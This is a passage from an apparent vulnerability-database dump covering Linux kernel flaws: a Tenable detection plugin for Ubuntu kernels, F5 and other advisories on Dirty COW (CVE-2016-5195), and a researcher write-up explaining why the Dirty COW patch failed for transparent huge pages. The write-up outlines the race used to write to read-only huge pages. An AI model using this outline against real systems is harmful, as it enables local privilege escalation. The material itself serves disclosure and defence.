value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.10-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.10-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.10-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.10-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/08\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2020 Canonical, Inc. / NASL script (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(17\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 17.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-1000405\", \"CVE-2017-12146\", \"CVE-2017-16939\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3508-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"17.04\", pkgname:\"linux-image-4.10.0-1023-raspi2\", pkgver:\"4.10.0-1023.26\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"linux-image-4.10.0-42-generic\", pkgver:\"4.10.0-42.46\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"linux-image-4.10.0-42-generic-lpae\", pkgver:\"4.10.0-42.46\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"linux-image-4.10.0-42-lowlatency\", pkgver:\"4.10.0-42.46\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"linux-image-generic\", pkgver:\"4.10.0.42.42\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"linux-image-generic-lpae\", pkgver:\"4.10.0.42.42\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"linux-image-lowlatency\", pkgver:\"4.10.0.42.42\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"linux-image-raspi2\", pkgver:\"4.10.0.1023.24\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.10-generic / linux-image-4.10-generic-lpae / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "android": [{"lastseen": "2020-06-22T14:42:11", "bulletinFamily": "software", "cvelist": ["CVE-2016-5195"], "description": "Race condition in mm/gup.c in the Linux kernel 2.x through 4.x before 4.8.3 allows local users to gain privileges by leveraging incorrect handling of a copy-on-write (COW) feature to write to a read-only memory mapping, as exploited in the wild in October 2016, aka \"Dirty COW.\"", "edition": 1, "modified": "2019-07-29T00:00:00", "published": "2016-11-01T00:00:00", "id": "ANDROID:CVE-2016-5195", "href": "http://www.androidvulnerabilities.org/vulnerabilities/CVE-2016-5195.html", "title": "CVE-2016-5195", "type": "android", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2020-11-22T06:19:47", "bulletinFamily": "info", "cvelist": ["CVE-2016-5195"], "description": "Race condition in mm/gup.c in the Linux kernel 2.x through 4.x before 4.8.3 allows local users to gain privileges by leveraging incorrect handling of a copy-on-write (COW) feature to write to a read-only memory mapping, as exploited in the wild in October 2016, aka \u201cDirty COW.\u201d\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 3:23am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n", "modified": "2020-06-05T00:00:00", "published": "2016-11-10T00:00:00", "id": "AKB:B6D57715-C0B3-48BB-8FDE-F3868F92DB1F", "href": "https://attackerkb.com/topics/E6o7dgfSHk/cve-2016-5195", "type": "attackerkb", "title": "CVE-2016-5195", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2019-08-20T04:37:49", "bulletinFamily": "software", "cvelist": ["CVE-2017-16939"], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "edition": 1, "modified": "2018-02-23T17:49:00", "published": "2018-02-23T17:49:00", "id": "F5:K81158013", "href": "https://support.f5.com/csp/article/K81158013", "title": "Linux kernel vulnerability CVE-2017-16939", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-06T22:40:41", "bulletinFamily": "software", "cvelist": ["CVE-2017-8824"], "description": "\nF5 Product Development has assigned ID 712876 (BIG-IP), ID 713060 (Enterprise Manager), and ID 713061 (BIG-IQ and F5 iWorkflow) to this vulnerability. Additionally, [F5 iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H15526101 on the **Diagnostics** > **Identified** > **Medium** page.\n\nTo determine if your product and version have been evaluated for this vulnerability, refer to the **Applies to (see versions)** box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases, point releases, or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Branch | Versions known to be vulnerable | Fixes introduced in | Severity | CVSSv3 score1 | Vulnerable component or feature \n---|---|---|---|---|---|--- \nBIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, FPS, GTM, Link Controller, PEM, WebAccelerator) | 14.x | 14.0.0 | 14.1.0 \n14.0.1.1 | Medium | [6.7](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>) | Linux kernel \n13.x | 13.0.0 - 13.1.1 | 13.1.1.2 \n12.x | 12.1.0 - 12.1.5 | 12.1.5.1 \n11.x | 11.2.1 - 11.6.5 | 11.6.5.1 \nARX | 6.x | None | Not applicable | Not vulnerable2 | None | None \nEnterprise Manager | 3.x | 3.1.1 | None3 | Medium | [6.7](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>) | Linux kernel \nBIG-IQ Centralized Management | 7.x | 7.0.0 | None | Medium | [6.7](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>) | Linux kernel \n6.x | 6.0.0 - 6.1.0 | None \n5.x | 5.0.0 - 5.4.0 | None \n4.x | 4.6.0 | None3 \nBIG-IQ Cloud and Orchestration | 1.x | 1.0.0 | None3 | Medium | [6.7](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>) | Linux kernel \nF5 iWorkflow | 2.x | 2.0.2 - 2.3.0 | None3 | Medium | [6.7](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>) | Linux kernel \nLineRate | 2.x | None | Not applicable | Not vulnerable2 | None | None \nTraffix SDC | 5.x | None | Not applicable | Not vulnerable2 | None | None \n4.x | None | Not applicable \n \n1The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\n2The specified products contain the affected code. However, F5 identifies the vulnerability status as Not vulnerable because the attacker cannot exploit the code in default, standard, or recommended configurations.\n\n3These products and versions have reached End of Life (EoL).\n\nF5 will not develop a fix for vulnerable products that do not already have a fixed version listed in this article and will not update this table with subsequent vulnerable releases in the associated branches. F5 recommends that you update to more recent, non-vulnerable versions whenever feasible. For more information, refer to [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Fixes introduced in** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K9502: BIG-IP hotfix and point release matrix](<https://support.f5.com/csp/article/K9502>)\n * [K48955220: Installing an OPSWAT Endpoint Security update on BIG-IP APM systems (11.4.x and later)](<https://support.f5.com/csp/article/K48955220>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "edition": 1, "modified": "2020-02-10T20:54:00", "published": "2018-05-08T17:43:00", "id": "F5:K15526101", "href": "https://support.f5.com/csp/article/K15526101", "title": "Linux kernel vulnerability CVE-2017-8824", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-06T22:40:20", "bulletinFamily": "software", "cvelist": ["CVE-2016-5195"], "description": "\nF5 Product Development has assigned IDs 624457 and 624459 (BIG-IP), ID 625230 (BIG-IQ), ID 625231 (Enterprise Manager), INSTALLER-2794 (Traffix SDC), and ID 625362 (F5 iWorkflow) to this vulnerability. Additionally, [F5 iHealth](<https://www.f5.com/services/support/support-offerings/big-ip-ihealth-diagnostic-tool>) may list Heuristic H624248 on the **Diagnostics** > **Identified** > **High** page. \n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases, point releases, or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP AAM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP AFM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP Analytics | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP APM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP ASM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP DNS | 12.0.0 - 12.1.2 | 13.0.0 \n12.1.2 HF1 | High | Linux kernel \nBIG-IP Edge Gateway | 11.2.1 \n10.2.1 - 10.2.4 | None | High | Linux kernel \nBIG-IP GTM | 11.4.0 - 11.6.1 \n11.2.1 | 11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP Link Controller | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP PEM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 \n\u200b\u200b\u200b\u200b\u200b\u200b\u200b12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP PSM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 \n\u200b\u200b\u200b\u200b\u200b\u200b\u200b12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP WebAccelerator | 11.2.1 | None | High | Linux kernel \nBIG-IP WOM | 11.2.1 | None | High | Linux kernel \nBIG-IP WebSafe | 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 | 13.0.0 \n\u200b\u200b\u200b\u200b\u200b\u200b\u200b12.1.2 HF1 \n\u200b\u200b\u200b\u200b\u200b\u200b\u200b11.6.2 \n11.6.1 HF2 | High | Linux kernel \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.1.1 | 3.1.1 HF8 | High | Linux kernel \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | High | Linux kernel \nBIG-IQ Device | 4.0.0 - 4.5.0 | None | High | Linux kernel \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | High | Linux kernel \nBIG-IQ ADC | 4.5.0 | None | High | Linux kernel \nBIG-IQ Centralized Management | 5.0.0 - 5.1.0 \n4.6.0 | 5.2.0 - 5.3.0 | High | Linux kernel \nF5 iWorkflow | 2.0.0 - 2.0.1 | 2.0.2 - 2.3.0 | High | Linux kernel \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | High | Linux kernel \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nTraffix SDC | 5.0.0 \n4.0.0 - 4.4.0 | None | Low | Linux kernel \n \nF5 will not develop a fix for vulnerable products that do not already have a fixed version listed in this article, and will not update this table with subsequent vulnerable releases in the associated branches. F5 recommends that you update to more recent, non-vulnerable versions whenever feasible. For more information, refer to [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable **column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\nMitigation\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 15.x)](<https://support.f5.com/csp/article/K13123>)\n", "edition": 1, "modified": "2019-09-26T18:41:00", "published": "2016-10-21T18:38:00", "id": "F5:K10558632", "href": "https://support.f5.com/csp/article/K10558632", "title": "Linux privilege-escalation vulnerability CVE-2016-5195 ", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-21T17:25:15", "bulletinFamily": "software", "cvelist": ["CVE-2016-5195"], "edition": 1, "description": "Supplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "modified": "2016-10-21T00:00:00", "published": "2016-10-21T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/k/10/sol10558632.html", "id": "SOL10558632", "type": "f5", "title": "SOL10558632 - Linux privilege-escalation vulnerability (Dirty COW) CVE-2016-5195", "cvss": {"score": 0.0, "vector": "NONE"}}], "seebug": [{"lastseen": "2017-12-25T18:30:18", "description": "The \u201cDirty COW\u201d vulnerability ([CVE-2016\u20135195](https://medium.com/r/?url=https%3A%2F%2Fcve.mitre.org%2Fcgi-bin%2Fcvename.cgi%3Fname%3DCVE-2016-5195)) is one of the most hyped and branded vulnerabilities published. Every Linux version from the last decade, including Android, desktops and servers was vulnerable. The impact was vast\u200a\u2014\u200amillions of users could be compromised easily and reliably, bypassing common exploit defenses.\r\n\r\nPlenty of information was published about the vulnerability, but its patch was not analyzed in detail.\r\n\r\nWe at Bindecy were interested to study the patch and all of its implications. Surprisingly, despite the enormous publicity the bug had received, we discovered that the patch was incomplete.\r\n\r\n### \"Dirty COW\" recap\r\nFirst, we need a full understanding of the original Dirty COW exploit. We\u2019ll assume basic understanding of the Linux memory manager. We won\u2019t recover the original gory details, as talented people have [already done](https://medium.com/r/?url=https%3A%2F%2Fchao-tic.github.io%2Fblog%2F2017%2F05%2F24%2Fdirty-cow) so.\r\n\r\nThe original vulnerability was in the `get_user_pages` function. This function is used to get the physical pages behind virtual addresses in user processes. The caller has to specify what kind of actions he intends to perform on these pages (touch, write, lock, etc\u2026), so the memory manager could prepare the pages accordingly. Specifically, when planning to perform a write action on a page inside a private mapping, the page may need to go through a COW (Copy-On-Write) cycle\u200a\u2014\u200athe original, \u201cread-only\u201d page is copied to a new page which is writable. The original page could be \u201cprivileged\u201d\u200a\u2014\u200ait could be mapped in other processes as well, and might even be written back to the disk after it\u2019s modified.\r\n\r\nLet\u2019s now take a look at the relevant code in `__get_user_pages`:\r\n```\r\n\r\nstatic long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,\r\n unsigned long start, unsigned long nr_pages,\r\n unsigned int gup_flags, struct page **pages,\r\n struct vm_area_struct **vmas, int *nonblocking)\r\n{\r\n // ...\r\n do {\r\n struct page *page;\r\n unsigned int foll_flags = gup_flags;\r\n // ...\r\n vma = find_extend_vma(mm, start);\r\n // ... \r\n \r\nretry:\r\n // ...\r\n cond_resched();\r\n page = follow_page_mask(vma, start, foll_flags, &page_mask);\r\n if (!page) {\r\n int ret;\r\n ret = faultin_page(tsk, vma, start, &foll_flags,\r\n nonblocking);\r\n switch (ret) {\r\n case 0:\r\n goto retry;\r\n case -EFAULT:\r\n case -ENOMEM:\r\n case -EHWPOISON:\r\n return i ? i : ret;\r\n case -EBUSY:\r\n return i;\r\n case -ENOENT:\r\n goto next_page;\r\n }\r\n BUG();\r\n }\r\n // ...\r\n \r\nnext_page:\r\n // ...\r\n nr_pages -= page_increm;\r\n } while (nr_pages);\r\n return i;\r\n}\r\n```\r\n\r\nThe `while` loop\u2019s goal is to fetch each page in the requested page range. Each page has to be faulted in until our requirements are satisfied\u200a\u2014\u200athat\u2019s what the `retry` label is used for.\r\n\r\n`follow_page_mask`\u2019s role is to scan the page tables to get the physical page for the given address (while taking into account the PTE permissions), or fail in case the request can\u2019t be satisfied. During `follow_page_mask`\u2019s operation the PTE\u2019s spinlock is acquired\u2014 this guarantees the physical page won\u2019t be released before we grab a reference.\r\n\r\n`faultin_page` requests the memory manager to handle the fault in the given address with the specified permissions (also under the PTE\u2019s spinlock). Note that after a successful call to `faultin_page` the lock is released\u200a\u2014\u200ait\u2019s not guaranteed that `follow_page_mask` will succeed in the next retry; another piece of code might have messed with our page.\r\n\r\nThe original vulnerable code resided at the end of faultin_page:\r\n```\r\nif ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))\r\n *flags &= ~FOLL_WRITE;\r\n```\r\n\r\nThe reason for removing the `FOLL_WRITE` flag is to take into account the case the `FOLL_FORCE` flag is applied on a read-only VMA (when the `VM_MAYWRITE` flag is set in the VMA). In that case, the `pte_maybe_mkwrite` function won\u2019t set the write bit, however the faulted-in page is indeed ready for writing.\r\n\r\nIf the page went through a COW cycle (marked by the `VM_FAULT_WRITE` flag) while performing faultin_page and the VMA is not writable, the `FOLL_WRITE flag` is removed from the next attempt to access the page\u200a\u2014\u200aonly read permissions will be requested.\r\n\r\nIf the first `follow_page_mask` fails because the page was read-only or not present, we\u2019ll try to fault it in. Now let\u2019s imagine that during that time, until the next attempt to get the page, we\u2019ll get rid of the COW version (e.g. by using `madvise(MADV_DONTNEED)`).\r\n\r\nThe next call to `faultin_page` will be made without the `FOLL_WRITE` flag, so we\u2019ll get the read-only version of the page from the page cache. Now, the next call to `follow_page_mask` will also happen without the `FOLL_WRITE` flag, so it will return the privileged read-only page\u200a\u2014\u200aas opposed to the caller\u2019s original request for a writable version of the page.\r\n\r\nBasically, the aforementioned flow is the Dirty COW vulnerability\u200a\u2014\u200ait allows us to write to the read-only privileged version of a page. The following fix was introduced in `faultin_page`:\r\n```\r\nif ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))\r\n *flags |= FOLL_COW; // Instead of *flags &= ~FOLL_WRITE;\r\n```\r\n\r\n\r\nAnd a new function, which is called by `follow_page_mask`, was added:\r\n```\r\n/*\r\n * FOLL_FORCE can write to even unwritable pte's, but only\r\n * after we've gone through a COW cycle and they are dirty.\r\n */\r\nstatic inline bool can_follow_write_pte(pte_t pte, unsigned int flags)\r\n{\r\n\treturn pte_write(pte) ||\r\n\t\t((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));\r\n}\r\n```\r\n\r\n\r\n\r\nInstead of reducing the requested permissions, `get_user_pages` now remembers the fact the we went through a COW cycle. On the next iteration, we would be able to get a read-only page for a write operation only if the `FOLL_FORCE` and `FOLL_COW` flags are specified, and that the PTE is marked as dirty.\r\n\r\nThis patch assumes that the read-only privileged copy of a page will never have a PTE pointing to it with the dirty bit on\u200a\u2014\u200aa reasonable assumption\u2026 or is it?\r\n\r\n### Transparent Huge Pages (THP)\r\nNormally, Linux usually uses a 4096-bytes long pages. In order to enable the system to manage large amounts of memory, we can either increase the number of page table entries, or use larger pages. We focus on the second method, which is implemented in Linux by using [huge pages](https://medium.com/r/?url=https%3A%2F%2Fgithub.com%2Florenzo-stoakes%2Flinux-vm-notes%2Fblob%2Fmaster%2Fsections%2Ftrans-huge-pages.md).\r\n\r\nA huge page is a 2MB long page. One of the ways to utilize this feature is through the Transparent Huge Pages mechanism. While there are other ways to get huge pages, they are outside of our scope.\r\n\r\nThe kernel will attempt to satisfy relevant memory allocations using huge pages. THP are swappable and \u201cbreakable\u201d (i.e. can be split into normal 4096-bytes pages), and can be used in anonymous, shmem and tmpfs mappings (the latter two are true only in newer kernel versions).\r\n\r\nUsually (depending on the compilation flags and the machine configuration) the default THP support is for anonymous mapping only. Shmem and tmpfs support can be turned on manually, and in general THP support can be turned on and off while the system is running by writing to some kernel\u2019s special files.\r\n\r\nAn important optimization opportunity is to coalesce normal pages into huge pages. A special daemon called khugepaged scans constantly for possible candidate pages that could be merged into huge pages. Obviously, to be a candidate, a VMA must cover a whole, aligned 2MB memory range.\r\n\r\nTHP is implemented by turning on the `_PAGE_PSE` bit of the PMD (Page Medium Directory, one level above the PTE level). The PMD thus points to a 2MB physical page, instead of a directory of PTEs. Each time the page tables are scanned, the PMDs must be checked with the `pmd_trans_huge` function, so we can decide whether the PMD points to a pfn or a directory of PTEs. On some architectures, huge PUDs (Page Upper Directory) exist as well, resulting in 1GB pages.\r\n\r\nTHP is supported since kernel 2.6.38. On most Android devices the THP subsystem is not enabled.\r\n\r\n### The bug\r\nDelving into the Dirty COW patch code that deals with THP, we can see that the same logic of `can_follow_write_pte` was applied to huge PMDs. A matching function called `can_follow_write_pm`d was added:\r\n```\r\nstatic inline bool can_follow_write_pmd(pmd_t pmd, unsigned int flags)\r\n{\r\n return pmd_write(pmd) ||\r\n ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pmd_dirty(pmd));\r\n}\r\n```\r\n\r\nHowever, in the huge PMD case, a page can be marked dirty without going through a COW cycle, using the `touch_pmd` function:\r\n```\r\nstatic void touch_pmd(struct vm_area_struct *vma, unsigned long addr,\r\n pmd_t *pmd)\r\n{\r\n pmd_t _pmd;\r\n\r\n /*\r\n * We should set the dirty bit only for FOLL_WRITE but for now\r\n * the dirty bit in the pmd is meaningless. And if the dirty\r\n * bit will become meaningful and we'll only set it with\r\n * FOLL_WRITE, an atomic set_bit will be required on the pmd to\r\n * set the young bit, instead of the current set_pmd_at.\r\n */\r\n _pmd = pmd_mkyoung(pmd_mkdirty(*pmd));\r\n if (pmdp_set_access_flags(vma, addr & HPAGE_PMD_MASK,\r\n pmd, _pmd, 1))\r\n update_mmu_cache_pmd(vma, addr, pmd);\r\n}\r\n```\r\n\r\n\r\n\r\nThis function is reached by `follow_page_mask`, which will be called each time `get_user_pages` tries to get a huge page. Obviously, the comment is incorrect and nowadays the dirty bit is NOT meaningless. In particular\u200a\u2014\u200awhen using `get_user_pages` to read a huge page, that page will be marked dirty without going through a COW cycle, and `can_follow_write_pmd`\u2019s logic is now broken.\r\n\r\nAt this point, exploiting the bug is straightforward\u200a\u2014\u200awe can use a similar pattern of the original Dirty COW race. This time, after we get rid of the copied version of the page, we have to fault the original page twice\u200a\u2014\u200afirst to make it present, and then to turn on the dirty bit.\r\n\r\nNow comes the inevitable question\u200a\u2014\u200ahow bad is this?\r\n\r\n### Bug implications\r\nIn order to exploit the bug, we have to choose an interesting read-only huge page as a target for the writing. The only constraint is that we need to be able to fetch it after it\u2019s discarded with `madvise(MADV_DONTNEED)`.\r\nAnonymous huge pages that were inherited from a parent process after a `fork` are a valuable target, however once they are discarded they are lost for good\u200a\u2014\u200awe can\u2019t fetch them again.\r\n\r\nWe found two interesting targets that should not be written into:\r\n* The huge zero page\r\n* Sealed (read-only) huge pages\r\n\r\n### The zero page\r\nWhen issuing a read fault on an anonymous mapping before it was ever written, we get a special physical page called the zero page. This optimization prevents the system from having to allocate multiple zeroed out pages in the system, which might never be written to. Thus, the exact same zero page is mapped in many different processes, which have different security levels.\r\n\r\nThe same principle applies to huge pages as well\u200a\u2014\u200athere\u2019s no need to create another huge page if no write fault has occurred yet\u200a\u2014\u200aa special page called the huge zero page will be mapped, instead. Note that this feature can be turned off as well.\r\n\r\n### THP, shmem and sealed files\r\nshmem and [tmpfs](https://medium.com/r/?url=https%3A%2F%2Fwww.kernel.org%2Fdoc%2FDocumentation%2Ffilesystems%2Ftmpfs.txt) files can be mapped using THP as well. shmem files can be created using the 